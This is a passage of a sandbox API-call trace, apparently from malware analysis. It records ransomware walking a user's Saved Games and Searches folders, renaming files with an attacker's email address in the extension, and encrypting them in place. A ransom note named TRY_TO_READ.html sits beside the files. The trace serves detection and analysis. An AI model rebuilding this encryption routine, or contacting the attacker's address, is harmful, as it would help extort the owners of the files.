	[0100.116] FindNextFileW (in: hFindFile=0x5da6b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.116] FindNextFileW (in: hFindFile=0x5da6b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.116] FindNextFileW (in: hFindFile=0x5da6b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca78ca50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.116] FindNextFileW (in: hFindFile=0x5da6b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca78ca50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.116] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.116] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.116] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.117] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 54
	[0100.117] GetProcessHeap () returned 0x540000
	[0100.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd2) returned 0x5919d0
	[0100.117] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini"
	[0100.117] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.117] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.119] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0
	[0100.119] GetProcessHeap () returned 0x540000
	[0100.119] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.119] GetFileSizeEx (in: hFile=0x4b0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=282) returned 1
	[0100.119] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x11a
	[0100.119] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.119] GetProcessHeap () returned 0x540000
	[0100.119] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.119] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.119] WriteFile (in: hFile=0x4b0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.120] WriteFile (in: hFile=0x4b0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.120] WriteFile (in: hFile=0x4b0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.120] ReadFile (in: hFile=0x4b0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x11a, lpOverlapped=0x0) returned 1
	[0100.121] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=-282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.121] WriteFile (in: hFile=0x4b0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x11a, lpOverlapped=0x0) returned 1
	[0100.121] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da6f0
	[0100.121] FindNextFileW (in: hFindFile=0x5da6f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.121] FindNextFileW (in: hFindFile=0x5da6f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.121] FindNextFileW (in: hFindFile=0x5da6f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1
	[0100.121] FindNextFileW (in: hFindFile=0x5da6f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1
	[0100.121] FindNextFileW (in: hFindFile=0x5da6f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca78ca50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.121] FindNextFileW (in: hFindFile=0x5da6f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca78ca50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.121] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.121] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.121] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x80) returned 1
	[0100.122] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 67
	[0100.122] GetProcessHeap () returned 0x540000
	[0100.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xec) returned 0x598b60
	[0100.122] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms"
	[0100.122] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.122] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.123] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b4
	[0100.124] GetProcessHeap () returned 0x540000
	[0100.124] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.124] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=248) returned 1
	[0100.124] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xf8
	[0100.124] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.124] GetProcessHeap () returned 0x540000
	[0100.124] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.124] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.124] WriteFile (in: hFile=0x4b4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.125] WriteFile (in: hFile=0x4b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.125] WriteFile (in: hFile=0x4b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.125] ReadFile (in: hFile=0x4b4, lpBuffer=0x598b60, nNumberOfBytesToRead=0xf8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598b60*, lpNumberOfBytesRead=0x3a1f778*=0xf8, lpOverlapped=0x0) returned 1
	[0100.125] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=-248, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.125] WriteFile (in: hFile=0x4b4, lpBuffer=0x57fb28*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesWritten=0x3a1f778*=0xf8, lpOverlapped=0x0) returned 1
	[0100.126] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.126] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.126] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", dwFileAttributes=0x80) returned 1
	[0100.126] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 60
	[0100.126] GetProcessHeap () returned 0x540000
	[0100.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x5919d0
	[0100.126] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms"
	[0100.126] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.126] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.128] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b4
	[0100.129] GetProcessHeap () returned 0x540000
	[0100.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.129] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=248) returned 1
	[0100.129] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xf8
	[0100.129] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.129] GetProcessHeap () returned 0x540000
	[0100.129] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.129] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.129] WriteFile (in: hFile=0x4b4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.130] WriteFile (in: hFile=0x4b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.130] WriteFile (in: hFile=0x4b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.130] ReadFile (in: hFile=0x4b4, lpBuffer=0x598b60, nNumberOfBytesToRead=0xf8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598b60*, lpNumberOfBytesRead=0x3a1f778*=0xf8, lpOverlapped=0x0) returned 1
	[0100.130] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=-248, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.130] WriteFile (in: hFile=0x4b4, lpBuffer=0x57fb28*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesWritten=0x3a1f778*=0xf8, lpOverlapped=0x0) returned 1
	[0100.131] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.131] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.131] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.131] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 51
	[0100.131] GetProcessHeap () returned 0x540000
	[0100.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xcc) returned 0x59d258
	[0100.131] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini"
	[0100.131] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.131] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.134] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b4
	[0100.134] GetProcessHeap () returned 0x540000
	[0100.134] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.134] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=524) returned 1
	[0100.134] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x20c
	[0100.134] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.134] GetProcessHeap () returned 0x540000
	[0100.134] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.134] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.134] WriteFile (in: hFile=0x4b4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.135] WriteFile (in: hFile=0x4b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.135] WriteFile (in: hFile=0x4b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.135] ReadFile (in: hFile=0x4b4, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x20c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x20c, lpOverlapped=0x0) returned 1
	[0100.135] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=-524, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.135] WriteFile (in: hFile=0x4b4, lpBuffer=0x5fb5a0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb5a0*, lpNumberOfBytesWritten=0x3a1f778*=0x20c, lpOverlapped=0x0) returned 1
